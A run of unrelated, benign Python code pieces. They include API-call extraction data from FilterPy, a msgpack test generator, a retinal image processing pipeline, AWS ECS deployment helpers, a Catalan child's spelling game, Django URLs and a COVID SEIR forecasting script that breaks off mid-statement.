((11936, 11958), 'numpy.linalg.inv', 'np.linalg.inv', (['(C1 + C2)'], {}), '(C1 + C2)\n', (11949, 11958), True, 'import numpy as np\n'), ((12501, 12514), 'scipy.linalg.svd', 'linalg.svd', (['P'], {}), '(P)\n', (12511, 12514), True, 'import scipy.linalg as linalg\n'), ((12533, 12561), 'math.atan2', 'math.atan2', (['U[1, 0]', 'U[0, 0]'], {}), '(U[1, 0], U[0, 0])\n', (12543, 12561), False, 'import math\n'), ((13448, 13467), 'numpy.linalg.eigh', 'np.linalg.eigh', (['cov'], {}), '(cov)\n', (13462, 13467), True, 'import numpy as np\n'), ((14248, 14264), 'numpy.isscalar', 'np.isscalar', (['var'], {}), '(var)\n', (14259, 14264), True, 'import numpy as np\n'), ((14298, 14310), 'numpy.sqrt', 'np.sqrt', (['var'], {}), '(var)\n', (14305, 14310), True, 'import numpy as np\n'), ((15402, 15416), 'numpy.isscalar', 'np.isscalar', (['x'], {}), '(x)\n', (15413, 15416), True, 'import numpy as np\n'), ((15529, 15545), 'numpy.atleast_2d', 'np.atleast_2d', (['x'], {}), '(x)\n', (15542, 15545), True, 'import numpy as np\n'), ((15940, 15960), 'random.gauss', 'random.gauss', (['(0)', 'std'], {}), '(0, std)\n', (15952, 15960), False, 'import random\n'), ((1093, 1357), 'warnings.warn', 'warnings.warn', (['"""You are using a version of SciPy that does not support the allow_singular parameter in scipy.stats.multivariate_normal.logpdf(). Future versions of FilterPy will require a version of SciPy that implements this keyword"""', 'DeprecationWarning'], {}), "(\n 'You are using a version of SciPy that does not support the allow_singular parameter in scipy.stats.multivariate_normal.logpdf(). Future versions of FilterPy will require a version of SciPy that implements this keyword'\n , DeprecationWarning)\n", (1106, 1357), False, 'import warnings\n'), ((3280, 3292), 'numpy.dot', 'np.dot', (['H', 'x'], {}), '(H, x)\n', (3286, 3292), True, 'import numpy as np\n'), ((4264, 4330), 'scipy.stats.multivariate_normal.logpdf', 'multivariate_normal.logpdf', (['flat_x', 'flat_mean', 'cov', 'allow_singular'], {}), '(flat_x, flat_mean, cov, allow_singular)\n', (4290, 4330), False, 'from scipy.stats import norm, multivariate_normal\n'), ((7920, 7973), 'math.exp', 'math.exp', (['(-(mean1 - mean2) ** 2 / (2 * (var1 + var2)))'], {}), '(-(mean1 - mean2) ** 2 / (2 * (var1 + var2)))\n', (7928, 7973), False, 'import math\n'), ((7991, 8029), 'math.sqrt', 'math.sqrt', (['(2 * math.pi * (var1 + var2))'], {}), '(2 * math.pi * (var1 + var2))\n', (8000, 8029), False, 'import math\n'), ((12587, 12602), 'math.sqrt', 'math.sqrt', (['s[0]'], {}), '(s[0])\n', (12596, 12602), False, 'import math\n'), ((12629, 12644), 'math.sqrt', 'math.sqrt', (['s[1]'], {}), '(s[1])\n', (12638, 12644), False, 'import math\n'), ((13962, 13978), 'numpy.isscalar', 'np.isscalar', (['std'], {}), '(std)\n', (13973, 13978), True, 'import numpy as np\n'), ((14066, 14087), 'numpy.isscalar', 'np.isscalar', (['interval'], {}), '(interval)\n', (14077, 14087), True, 'import numpy as np\n'), ((14974, 14988), 'math.sqrt', 'math.sqrt', (['var'], {}), '(var)\n', (14983, 14988), False, 'import math\n'), ((15618, 15639), 'numpy.linalg.cholesky', 'np.linalg.cholesky', (['x'], {}), '(x)\n', (15636, 15639), True, 'import numpy as np\n'), ((15973, 16007), 'random.gammavariate', 'random.gammavariate', (['(0.5 * df)', '(2.0)'], {}), '(0.5 * df, 2.0)\n', (15992, 16007), False, 'import random\n'), ((1573, 1599), 'numpy.asarray', 'np.asarray', (['u'], {'dtype': 'dtype'}), '(u, dtype=dtype)\n', (1583, 1599), True, 'import numpy as np\n'), ((3239, 3253), 'numpy.dot', 'np.dot', (['P', 'H.T'], {}), '(P, H.T)\n', (3245, 3253), True, 'import numpy as np\n'), ((4198, 4211), 'numpy.asarray', 'np.asarray', (['x'], {}), '(x)\n', (4208, 4211), True, 'import numpy as np\n'), ((10236, 10268), 'numpy.array', 'np.array', (['x'], {'copy': '(False)', 'ndmin': '(1)'}), '(x, copy=False, ndmin=1)\n', (10244, 10268), True, 'import numpy as np\n'), ((10288, 10321), 'numpy.array', 'np.array', (['mu'], {'copy': '(False)', 'ndmin': '(1)'}), '(mu, copy=False, ndmin=1)\n', (10296, 10321), True, 'import numpy as np\n'), ((10399, 10420), 'math.log', 'math.log', (['(2 * math.pi)'], {}), '(2 * math.pi)\n', (10407, 10420), False, 'import math\n'), ((10421, 10443), 'numpy.linalg.slogdet', 'np.linalg.slogdet', (['cov'], {}), '(cov)\n', (10438, 10443), True, 'import numpy as np\n'), ((11966, 11985), 'numpy.dot', 'np.dot', (['C1', 'sum_inv'], {}), '(C1, sum_inv)\n', (11972, 11985), True, 'import numpy as np\n'), ((14140, 14163), 'scipy.stats.norm.interval', 'norm.interval', (['interval'], {}), '(interval)\n', (14153, 14163), False, 'from scipy.stats import norm, multivariate_normal\n'), ((15004, 15043), 'scipy.stats.norm.cdf', 'norm.cdf', (['x_range[0]'], {'loc': 'mu', 'scale': 'std'}), '(x_range[0], loc=mu, scale=std)\n', (15012, 15043), False, 'from scipy.stats import norm, multivariate_normal\n'), ((15061, 15100), 'scipy.stats.norm.cdf', 'norm.cdf', (['x_range[1]'], {'loc': 'mu', 'scale': 'std'}), '(x_range[1], loc=mu, scale=std)\n', (15069, 15100), False, 'from scipy.stats import norm, multivariate_normal\n'), ((15506, 15515), 'numpy.eye', 'np.eye', (['n'], {}), '(n)\n', (15512, 15515), True, 'import numpy as np\n'), ((16024, 16041), 'math.sqrt', 'math.sqrt', (['(y / df)'], {}), '(y / df)\n', (16033, 16041), False, 'import math\n'), ((2972, 2978), 'numpy.linalg.inv', 'inv', (['S'], {}), '(S)\n', (2975, 2978), False, 'from numpy.linalg import inv\n'), ((4122, 4138), 'numpy.asarray', 'np.asarray', (['mean'], {}), '(mean)\n', (4132, 4138), True, 'import numpy as np\n'), ((5478, 5491), 'numpy.shape', 'np.shape', (['pdf'], {}), '(pdf)\n', (5486, 5491), True, 'import numpy as np\n'), ((12005, 12024), 'numpy.dot', 'np.dot', (['C2', 'sum_inv'], {}), '(C2, sum_inv)\n', (12011, 12024), True, 'import numpy as np\n'), ((12045, 12064), 'numpy.dot', 'np.dot', (['C1', 'sum_inv'], {}), '(C1, sum_inv)\n', (12051, 12064), True, 'import numpy as np\n'), ((10510, 10532), 'scipy.sparse.linalg.spsolve', 'spln.spsolve', (['cov', 'err'], {}), '(cov, err)\n', (10522, 10532), True, 'import scipy.sparse.linalg as spln\n'), ((10574, 10599), 'numpy.linalg.solve', 'np.linalg.solve', (['cov', 'err'], {}), '(cov, err)\n', (10589, 10599), True, 'import numpy as np\n'), ((17044, 17057), 'scipy.linalg.inv', 'linalg.inv', (['p'], {}), '(p)\n', (17054, 17057), True, 'import scipy.linalg as linalg\n'), ((5424, 5437), 'numpy.asarray', 'np.asarray', (['x'], {}), '(x)\n', (5434, 5437), True, 'import numpy as np\n')] |
import msgpack
ASSERT_TEMPLATE = """
(test-group "%(name)s"
(test "unpack" %(chicken_expr)s (unpack/from-blob (byte-blob %(blob)s)))
(test "pack" (pack/to-blob %(chicken_expr)s) (byte-blob %(blob)s)))
"""
def asChickenAssertion(data, chicken_expr=None, name=None):
blob = ' '.join([hex(b).replace('0', '#', 1) for b in msgpack.dumps(data)])
return ASSERT_TEMPLATE % {
"name": name if name else str(data),
"blob": blob,
"chicken_expr": data if chicken_expr is None else chicken_expr
}
header = open("tests/python-ref-header.scm").readlines()
test_ref_file = open("tests/python-ref-tests.scm", "w")
test_ref_file.writelines(header)
def append_assert(*args, **kwargs):
test_ref_file.write(asChickenAssertion(*args, **kwargs))
append_assert( -1)
append_assert(-100)
append_assert(100)
append_assert(100102831903)
append_assert(-100102831903)
append_assert(1.3313)
append_assert([], "'#()")
append_assert([10, True, ["hi"]], """'#(10 #t #("hi"))""")
append_assert(
msgpack.ExtType(42, 'a'.encode('utf8')),
"""(make-extension 42 (string->byte-blob "a"))""")
| [
"msgpack.dumps"
] | [((325, 344), 'msgpack.dumps', 'msgpack.dumps', (['data'], {}), '(data)\n', (338, 344), False, 'import msgpack\n')] |
'''
Script to pull in set of cif files and make a single dataframe .
@author: pmm
'''
import numpy as np
import os
import sys
sys.path.append('../')
import pyXtal as pxt
from pyXtal.csp_utils.dataset_io import parse_filenames
import pandas as pd
dirs = ['/Users/pmm/Documents/xtal_learning/triptycene/cifs/T2',
'/Users/pmm/Documents/xtal_learning/triptycene/cifs/ring3',
'/Users/pmm/Documents/xtal_learning/triptycene/cifs/ring32',
'/Users/pmm/Documents/xtal_learning/triptycene/cifs/ring34',
'/Users/pmm/Documents/xtal_learning/triptycene/cifs/ring39'
]
frames=[]
for dir in dirs:
_df = parse_filenames(dir, keys=['_','Energy','Density'])
_df.set_index("Name",inplace=True)
frames.append(_df)
df = pd.concat(frames)
df.to_pickle('/Users/pmm/Documents/xtal_learning/triptycene/cifs/data_triptycene_set') | [
"pyXtal.csp_utils.dataset_io.parse_filenames",
"sys.path.append",
"pandas.concat"
] | [((127, 149), 'sys.path.append', 'sys.path.append', (['"""../"""'], {}), "('../')\n", (142, 149), False, 'import sys\n'), ((758, 775), 'pandas.concat', 'pd.concat', (['frames'], {}), '(frames)\n', (767, 775), True, 'import pandas as pd\n'), ((634, 687), 'pyXtal.csp_utils.dataset_io.parse_filenames', 'parse_filenames', (['dir'], {'keys': "['_', 'Energy', 'Density']"}), "(dir, keys=['_', 'Energy', 'Density'])\n", (649, 687), False, 'from pyXtal.csp_utils.dataset_io import parse_filenames\n')] |
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
"""
Created on Tue Oct 16 14:53:15 2018
@author: yansl
Note:
synthesize the whole procedure
"""
import os
import shutil
import gc
import cv2
import time
import mask_maker
import image_fill
import discreteness_boundary_repair
import filter_enhancement
#%%
def file_operation(folder_name):
#creating a folder to save the results
pwd = os.getcwd()
pwd = pwd.strip()
path = pwd.rstrip('\\')
save_path = path.replace('\\', '/') + '/' + folder_name
#make sure the save path is existed
#note that the existed folder will be deleted
if not (os.path.exists(save_path)):
os.makedirs(save_path)
else:
shutil.rmtree(save_path)
os.makedirs(save_path)
return (save_path + '/')
def result_saving(image_name, folder_name, postfix, file):
cv2.imwrite(folder_name + image_name + postfix, file)
return None
#%%
def files_iteration():
start_time = time.time()
#creating some saving folders
saving_mask = file_operation('recovering_mask')
saving_first = file_operation('first_filtered')
saving_usm = file_operation('usm')
saving_border = file_operation('border_adding_image')
saving_recorrected = file_operation('recorrected_image')
#getting the original data folder
current_path = os.getcwd()
image_path = current_path.replace('\\', '/') + '/' + 'original_images'
for images in os.listdir(image_path):
full_path = os.path.join(image_path, images)
if os.path.isdir(full_path):
continue
file = os.path.normcase(full_path)
(recovering_mask, output, original_appearance_masking, usm_image, recorrected_image, image_name) = main(file)
result_saving(image_name, saving_mask, '_recovering_mask.png', recovering_mask)
result_saving(image_name, saving_first, '_first_filter_image.png', output)
result_saving(image_name, saving_usm, '_usm.png', usm_image)
result_saving(image_name, saving_border, '_border_adding_image.png', original_appearance_masking)
result_saving(image_name, saving_recorrected, '_recorrected_image.png', recorrected_image)
end_time = time.time()
lapse = end_time - start_time
print('time cost', lapse, 's')
return None
def main(file):
#main
#reading input images with opencv
image = cv2.imread(file, cv2.IMREAD_COLOR)
#making mask
(resized_image, mask_out, direct_out) = mask_maker.mask(image)
#cropping mask & image
(cropped_mask, cropped_image, cropped_direct_mask, original_appearance) = mask_maker.border_cropping(resized_image, mask_out, direct_out)
#releasing memory
del image, mask_out, resized_image, direct_out
gc.collect()
#adding border
#border default length is 20
(mask_adding, image_adding, original_appearance_adding, coordinate) = mask_maker.border_adding(cropped_mask, cropped_image, original_appearance, border_length=20)
#Reclaiming the original size masks & the masked images
(direct_mask_adding, original_appearance_masking) = mask_maker.border_corresponding(cropped_mask, cropped_direct_mask, original_appearance_adding, border_length=20)
#FOV extraction
(ellipse_mask, ellipse) = mask_maker.FOV_adjustment(mask_adding)
#Recovering masks & images for post-processing & testing
(recovering_mask, recorrected_image) = mask_maker.recovering(mask_adding, ellipse_mask, original_appearance_masking, direct_mask_adding)
#reflection symmetry
(reflected_mask, reflected_image) = image_fill.reflection_symmetry(mask_adding, image_adding, coordinate, border_length=20)
#ROI cutting
(cut_mask, cut_image) = image_fill.circle_cutting(ellipse_mask, reflected_mask, reflected_image)
#circle filling
filled_image = image_fill.circle_fill(cut_mask, cut_image, ellipse)
#boundary repairing
repaired_image = discreteness_boundary_repair.border_repair(cut_mask, filled_image, ellipse, 7)
#filtering filled image
(filtered_image, output) = filter_enhancement.filter_enhancement(repaired_image)
#unsharp mask enhancement
usm_image = filter_enhancement.usm_enhancement(filtered_image)
core_name = os.path.split(file)[1]
image_name = os.path.splitext(core_name)[0]
return (recovering_mask, output, original_appearance_masking, usm_image, recorrected_image, image_name)
#entrance
if __name__ == '__main__':
files_iteration()
| [
"mask_maker.border_cropping",
"image_fill.reflection_symmetry",
"mask_maker.border_adding",
"filter_enhancement.usm_enhancement",
"mask_maker.FOV_adjustment",
"image_fill.circle_fill",
"filter_enhancement.filter_enhancement",
"os.path.exists",
"os.listdir",
"os.path.split",
"os.path.isdir",
"m... | [((422, 433), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (431, 433), False, 'import os\n'), ((892, 945), 'cv2.imwrite', 'cv2.imwrite', (['(folder_name + image_name + postfix)', 'file'], {}), '(folder_name + image_name + postfix, file)\n', (903, 945), False, 'import cv2\n'), ((1012, 1023), 'time.time', 'time.time', ([], {}), '()\n', (1021, 1023), False, 'import time\n'), ((1385, 1396), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1394, 1396), False, 'import os\n'), ((1492, 1514), 'os.listdir', 'os.listdir', (['image_path'], {}), '(image_path)\n', (1502, 1514), False, 'import os\n'), ((2259, 2270), 'time.time', 'time.time', ([], {}), '()\n', (2268, 2270), False, 'import time\n'), ((2447, 2481), 'cv2.imread', 'cv2.imread', (['file', 'cv2.IMREAD_COLOR'], {}), '(file, cv2.IMREAD_COLOR)\n', (2457, 2481), False, 'import cv2\n'), ((2545, 2567), 'mask_maker.mask', 'mask_maker.mask', (['image'], {}), '(image)\n', (2560, 2567), False, 'import mask_maker\n'), ((2675, 2738), 'mask_maker.border_cropping', 'mask_maker.border_cropping', (['resized_image', 'mask_out', 'direct_out'], {}), '(resized_image, mask_out, direct_out)\n', (2701, 2738), False, 'import mask_maker\n'), ((2823, 2835), 'gc.collect', 'gc.collect', ([], {}), '()\n', (2833, 2835), False, 'import gc\n'), ((2965, 3061), 'mask_maker.border_adding', 'mask_maker.border_adding', (['cropped_mask', 'cropped_image', 'original_appearance'], {'border_length': '(20)'}), '(cropped_mask, cropped_image, original_appearance,\n border_length=20)\n', (2989, 3061), False, 'import mask_maker\n'), ((3176, 3292), 'mask_maker.border_corresponding', 'mask_maker.border_corresponding', (['cropped_mask', 'cropped_direct_mask', 'original_appearance_adding'], {'border_length': '(20)'}), '(cropped_mask, cropped_direct_mask,\n original_appearance_adding, border_length=20)\n', (3207, 3292), False, 'import mask_maker\n'), ((3350, 3388), 'mask_maker.FOV_adjustment', 'mask_maker.FOV_adjustment', (['mask_adding'], {}), '(mask_adding)\n', (3375, 3388), False, 'import mask_maker\n'), ((3501, 3602), 'mask_maker.recovering', 'mask_maker.recovering', (['mask_adding', 'ellipse_mask', 'original_appearance_masking', 'direct_mask_adding'], {}), '(mask_adding, ellipse_mask,\n original_appearance_masking, direct_mask_adding)\n', (3522, 3602), False, 'import mask_maker\n'), ((3676, 3767), 'image_fill.reflection_symmetry', 'image_fill.reflection_symmetry', (['mask_adding', 'image_adding', 'coordinate'], {'border_length': '(20)'}), '(mask_adding, image_adding, coordinate,\n border_length=20)\n', (3706, 3767), False, 'import image_fill\n'), ((3815, 3887), 'image_fill.circle_cutting', 'image_fill.circle_cutting', (['ellipse_mask', 'reflected_mask', 'reflected_image'], {}), '(ellipse_mask, reflected_mask, reflected_image)\n', (3840, 3887), False, 'import image_fill\n'), ((3929, 3981), 'image_fill.circle_fill', 'image_fill.circle_fill', (['cut_mask', 'cut_image', 'ellipse'], {}), '(cut_mask, cut_image, ellipse)\n', (3951, 3981), False, 'import image_fill\n'), ((4029, 4107), 'discreteness_boundary_repair.border_repair', 'discreteness_boundary_repair.border_repair', (['cut_mask', 'filled_image', 'ellipse', '(7)'], {}), '(cut_mask, filled_image, ellipse, 7)\n', (4071, 4107), False, 'import discreteness_boundary_repair\n'), ((4179, 4232), 'filter_enhancement.filter_enhancement', 'filter_enhancement.filter_enhancement', (['repaired_image'], {}), '(repaired_image)\n', (4216, 4232), False, 'import filter_enhancement\n'), ((4285, 4335), 'filter_enhancement.usm_enhancement', 'filter_enhancement.usm_enhancement', (['filtered_image'], {}), '(filtered_image)\n', (4319, 4335), False, 'import filter_enhancement\n'), ((658, 683), 'os.path.exists', 'os.path.exists', (['save_path'], {}), '(save_path)\n', (672, 683), False, 'import os\n'), ((695, 717), 'os.makedirs', 'os.makedirs', (['save_path'], {}), '(save_path)\n', (706, 717), False, 'import os\n'), ((738, 762), 'shutil.rmtree', 'shutil.rmtree', (['save_path'], {}), '(save_path)\n', (751, 762), False, 'import shutil\n'), ((772, 794), 'os.makedirs', 'os.makedirs', (['save_path'], {}), '(save_path)\n', (783, 794), False, 'import os\n'), ((1537, 1569), 'os.path.join', 'os.path.join', (['image_path', 'images'], {}), '(image_path, images)\n', (1549, 1569), False, 'import os\n'), ((1582, 1606), 'os.path.isdir', 'os.path.isdir', (['full_path'], {}), '(full_path)\n', (1595, 1606), False, 'import os\n'), ((1646, 1673), 'os.path.normcase', 'os.path.normcase', (['full_path'], {}), '(full_path)\n', (1662, 1673), False, 'import os\n'), ((4363, 4382), 'os.path.split', 'os.path.split', (['file'], {}), '(file)\n', (4376, 4382), False, 'import os\n'), ((4404, 4431), 'os.path.splitext', 'os.path.splitext', (['core_name'], {}), '(core_name)\n', (4420, 4431), False, 'import os\n')] |
import tensorflow as tf
from dltk.core.activations import leaky_relu
import numpy as np
def test_leaky_relu():
test_alpha = tf.constant(0.1)
test_inp_1 = tf.constant(1.)
test_inp_2 = tf.constant(-1.)
test_relu_1 = leaky_relu(test_inp_1, test_alpha)
test_relu_2 = leaky_relu(test_inp_2, test_alpha)
with tf.Session() as s:
out_1 = s.run(test_relu_1)
assert np.isclose(out_1, 1.), \
'Got {} but expected {}'.format(out_1, 1.)
out_2 = s.run(test_relu_2)
assert np.isclose(out_2, -0.1), \
'Got {} but expected {}'.format(out_2, -0.1)
| [
"tensorflow.Session",
"tensorflow.constant",
"numpy.isclose",
"dltk.core.activations.leaky_relu"
] | [((130, 146), 'tensorflow.constant', 'tf.constant', (['(0.1)'], {}), '(0.1)\n', (141, 146), True, 'import tensorflow as tf\n'), ((164, 180), 'tensorflow.constant', 'tf.constant', (['(1.0)'], {}), '(1.0)\n', (175, 180), True, 'import tensorflow as tf\n'), ((197, 214), 'tensorflow.constant', 'tf.constant', (['(-1.0)'], {}), '(-1.0)\n', (208, 214), True, 'import tensorflow as tf\n'), ((233, 267), 'dltk.core.activations.leaky_relu', 'leaky_relu', (['test_inp_1', 'test_alpha'], {}), '(test_inp_1, test_alpha)\n', (243, 267), False, 'from dltk.core.activations import leaky_relu\n'), ((286, 320), 'dltk.core.activations.leaky_relu', 'leaky_relu', (['test_inp_2', 'test_alpha'], {}), '(test_inp_2, test_alpha)\n', (296, 320), False, 'from dltk.core.activations import leaky_relu\n'), ((331, 343), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (341, 343), True, 'import tensorflow as tf\n'), ((400, 422), 'numpy.isclose', 'np.isclose', (['out_1', '(1.0)'], {}), '(out_1, 1.0)\n', (410, 422), True, 'import numpy as np\n'), ((531, 554), 'numpy.isclose', 'np.isclose', (['out_2', '(-0.1)'], {}), '(out_2, -0.1)\n', (541, 554), True, 'import numpy as np\n')] |
import collections
import typing
from . import tags
from .iterators import chunked_iterable
from .models import Project
def list_cluster_arns_in_account(ecs_client):
"""
Generates the ARN of every ECS cluster in an account.
"""
paginator = ecs_client.get_paginator("list_clusters")
for page in paginator.paginate():
yield from page["clusterArns"]
def list_service_arns_in_cluster(ecs_client, *, cluster):
"""
Generates the ARN of every ECS service in a cluster.
"""
paginator = ecs_client.get_paginator("list_services")
for page in paginator.paginate(cluster=cluster):
yield from page["serviceArns"]
def describe_services(session):
"""
Describe all the ECS services in an account.
"""
ecs_client = session.client("ecs")
result = []
for cluster in list_cluster_arns_in_account(ecs_client):
service_arns = list_service_arns_in_cluster(ecs_client, cluster=cluster)
# We can specify up to 10 services in a single DescribeServices API call.
for service_set in chunked_iterable(service_arns, size=10):
resp = ecs_client.describe_services(
cluster=cluster,
services=service_set,
include=["TAGS"]
)
result.extend(resp["services"])
return result
class NoMatchingServiceError(Exception):
pass
class MultipleMatchingServicesError(Exception):
pass
def find_matching_service(
service_descriptions, *, service_id, environment_id
):
"""
Given a service (e.g. bag-unpacker) and an environment (e.g. prod),
return the unique matching service.
"""
try:
return tags.find_unique_resource_matching_tags(
service_descriptions,
expected_tags={
"deployment:service": service_id,
"deployment:env": environment_id,
}
)
except tags.NoMatchingResourceError:
raise NoMatchingServiceError(
f"No matching service found for {service_id}/{environment_id}!"
)
except tags.MultipleMatchingResourcesError:
raise MultipleMatchingServicesError(
f"Multiple matching services found for {service_id}/{environment_id}!"
)
def find_service_arns_for_release(
*, project: Project, release, service_descriptions, environment_id
):
"""
Build a dictionary (image ID) -> list(service ARNs) for all the images
in a particular release.
"""
result = {image_id: [] for image_id in release["images"]}
for image_id in release["images"]:
try:
services = project.image_repositories[image_id].services
except KeyError:
continue
for service_id in services:
try:
matching_service = find_matching_service(
service_descriptions,
service_id=service_id,
environment_id=environment_id
)
except NoMatchingServiceError:
continue
result[image_id].append(matching_service["serviceArn"])
return result
def deploy_service(session, *, cluster_arn, service_arn, deployment_label):
"""
Triggers a deployment of a given service.
"""
ecs_client = session.client("ecs")
resp = ecs_client.update_service(
cluster=cluster_arn,
service=service_arn,
forceNewDeployment=True
)
ecs_client.tag_resource(
resourceArn=service_arn,
tags=tags.to_aws_tags({"deployment:label": deployment_label})
)
return {
"cluster_arn": resp["service"]["clusterArn"],
"service_arn": resp["service"]["serviceArn"],
"deployment_id": resp["service"]["deployments"][0]["id"]
}
def list_tasks_in_service(session, *, cluster_arn, service_name):
"""
Given the name of a service, return a list of tasks running within
the service.
"""
ecs_client = session.client("ecs")
task_arns = []
paginator = ecs_client.get_paginator("list_tasks")
for page in paginator.paginate(
cluster=cluster_arn, serviceName=service_name
):
task_arns.extend(page["taskArns"])
# If task_arns is empty we can't ask to describe them.
# TODO: This method can handle up to 100 task ARNs. It seems unlikely
# we'd ever have more than that, hence not handling it properly.
if task_arns:
resp = ecs_client.describe_tasks(
cluster=cluster_arn,
tasks=task_arns,
include=["TAGS"]
)
return resp["tasks"]
else:
return []
def find_ecs_services_for_release(
*,
project: Project,
service_descriptions: typing.List[typing.Dict],
release: str,
environment_id: str
):
"""
Returns a map (image ID) -> Dict(service ID -> ECS service description)
"""
matched_services = collections.defaultdict(dict)
for image_id, _ in release['images'].items():
# Attempt to match deployment image id to config and override service_ids
try:
matched_image = project.image_repositories[image_id]
except KeyError:
continue
for service_id in matched_image.services:
try:
service_description = find_matching_service(
service_descriptions=service_descriptions,
service_id=service_id,
environment_id=environment_id
)
matched_services[image_id] = {
service_id: service_description
}
except NoMatchingServiceError:
pass
return matched_services
| [
"collections.defaultdict"
] | [((4927, 4956), 'collections.defaultdict', 'collections.defaultdict', (['dict'], {}), '(dict)\n', (4950, 4956), False, 'import collections\n')] |
# -*- coding: utf-8 -*-
#!/usr/bin/env python
import sys
import os
import subprocess
import pyttsx
from gtts import gTTS
import readchar
from PIL import Image
ordinals = ["primera", "segona", "tercera", "quarta", "cinquena", "sisena", "setena", "vuitena", "novena", "desena"]
def digues(frase):
tts = gTTS(text=frase, lang='ca')
tts.save("frase.mp3")
os.system("vlc --play-and-exit --quiet frase.mp3")
return
def ordinal(numero):
if numero < 10:
return ordinals[numero]
else:
return "següent"
print("JDH 27/08/2016 Bogotà")
print("Programa per ensenyar al Martí i a la Laia a escriure el seu nom (o un altre) en un teclat d'ordinador")
print("Command Line Arguments:" + str(len(sys.argv)))
print("Command Line Arguments List:" + str(sys.argv))
if len(sys.argv) != 2:
print("Per funcionar s'ha de cridar el programa amb un nom. Per exemple: $ python joc-escriu-nom.py MARTI")
sys.exit()
nom = sys.argv[1].upper()
if len(nom) < 2:
print("El nom ha de ser de 2 lletres o mes")
sys.exit()
index = 0
nomEscrit = "";
#imgOK = Image.open("bb8.png")
#imgKO = Image.open("darkvader.jpg")
digues("Escriu " + nom)
while index < len(nom):
print("Has d'escriure \"" + nom + "\" i has escrit \"" + nomEscrit + "\". Escriu una lletra:")
print(nom + " -> " + nomEscrit)
digues("Busca la lletra " + nom[index])
keyPressed = readchar.readchar().upper()
if keyPressed == "EXIT":
sys.exit()
if len(keyPressed) > 1:
#imgKO.show()
p = subprocess.Popen(["display", "darkvader.jpg"])
digues("Només has d'escriure una lletra. Torna-ho a provar")
p.kill()
#imgKO.close()
else:
if nom[index] != keyPressed:
#imgKO.show()
p = subprocess.Popen(["display", "darkvader.jpg"])
digues("NO. Has escrit la " + keyPressed + ". Torna-ho a provar")
p.kill()
#imgKO.close()
else:
if index < (len(nom) - 1):
nomEscrit = nomEscrit + keyPressed
index = index + 1
#digues("Perfecte. Ara escriu la " + ordinal(index) + " lletra")
else:
#imgOK.show()
p = subprocess.Popen(["display", "bb8.png"])
digues("Ja has acabat. Ho has fet molt bé")
p.kill()
#imgOK.close()
index = index + 1
print("Fi del joc. Torna-ho a provar amb un altre nom")
#digues("Fi del jòc. Si vols, torna-ho a provar amb un altre nòm")
| [
"subprocess.Popen",
"readchar.readchar",
"gtts.gTTS",
"sys.exit",
"os.system"
] | [((307, 334), 'gtts.gTTS', 'gTTS', ([], {'text': 'frase', 'lang': '"""ca"""'}), "(text=frase, lang='ca')\n", (311, 334), False, 'from gtts import gTTS\n'), ((365, 415), 'os.system', 'os.system', (['"""vlc --play-and-exit --quiet frase.mp3"""'], {}), "('vlc --play-and-exit --quiet frase.mp3')\n", (374, 415), False, 'import os\n'), ((929, 939), 'sys.exit', 'sys.exit', ([], {}), '()\n', (937, 939), False, 'import sys\n'), ((1037, 1047), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1045, 1047), False, 'import sys\n'), ((1452, 1462), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1460, 1462), False, 'import sys\n'), ((1526, 1572), 'subprocess.Popen', 'subprocess.Popen', (["['display', 'darkvader.jpg']"], {}), "(['display', 'darkvader.jpg'])\n", (1542, 1572), False, 'import subprocess\n'), ((1387, 1406), 'readchar.readchar', 'readchar.readchar', ([], {}), '()\n', (1404, 1406), False, 'import readchar\n'), ((1771, 1817), 'subprocess.Popen', 'subprocess.Popen', (["['display', 'darkvader.jpg']"], {}), "(['display', 'darkvader.jpg'])\n", (1787, 1817), False, 'import subprocess\n'), ((2232, 2272), 'subprocess.Popen', 'subprocess.Popen', (["['display', 'bb8.png']"], {}), "(['display', 'bb8.png'])\n", (2248, 2272), False, 'import subprocess\n')] |
from django.conf import settings
from django.conf.urls import include
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('', include('apps.sitio.urls', namespace='sitio')),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
handler404 = 'apps.sitio.views.handler404'
handler500 = 'apps.sitio.views.handler500' | [
"django.conf.urls.include",
"django.conf.urls.static.static"
] | [((295, 358), 'django.conf.urls.static.static', 'static', (['settings.STATIC_URL'], {'document_root': 'settings.STATIC_ROOT'}), '(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n', (301, 358), False, 'from django.conf.urls.static import static\n'), ((378, 439), 'django.conf.urls.static.static', 'static', (['settings.MEDIA_URL'], {'document_root': 'settings.MEDIA_ROOT'}), '(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n', (384, 439), False, 'from django.conf.urls.static import static\n'), ((206, 251), 'django.conf.urls.include', 'include', (['"""apps.sitio.urls"""'], {'namespace': '"""sitio"""'}), "('apps.sitio.urls', namespace='sitio')\n", (213, 251), False, 'from django.conf.urls import include\n')] |
import os
import pandas as pd
from rivm_loader import rivm
from constants import CoronaConstants
import datetime as dt
from mobility_seir import *
import copy
'''
Create forecasts without confidence intervals.
Always check for inclusion of mobility or not!!!
'''
fn = os.path.join(os.path.dirname(__file__), 'data/COVID-19_prevalentie.json')
df_besmettelijk = pd.read_json(fn).set_index('Date')
Avg_contacts = CoronaConstants.contacts_average
# State starting date and horizon:
start_date = "01-07-2020"
end_date = "31-12-2020"
date_format = '%d-%m-%Y'
start_date_number = dt.datetime.strptime(start_date,date_format)
end_date_number = dt.datetime.strptime(end_date,date_format)
Look_into_past = 7
Trans_rates = pd.read_csv("results_forecasting/Trans_rates_NB_mob_final_new.csv").set_index('date')
horizon = 14
horizon_2 = 7
Trans_rates['local_avg7'] = Trans_rates['rate_loc'].rolling(7).mean().shift(0)
Trans_rates['mob_avg7'] = Trans_rates['rate_mob'].rolling(7).mean().shift(0)
#Trans_rates['mob_avg7'] = 0
Trans_rates['pos_avg7'] = Trans_rates['frac_pos'].rolling(7).mean().shift(0)
Trans_rates['mobility_avg7'] = Trans_rates['mobility'].rolling(7).mean().shift(0)
# Create dataframe dictionaries
dfs_RIVM = pd.DataFrame(columns = ['name','date',
'susceptible','exposed','infected_tested',
'infected_nottested',
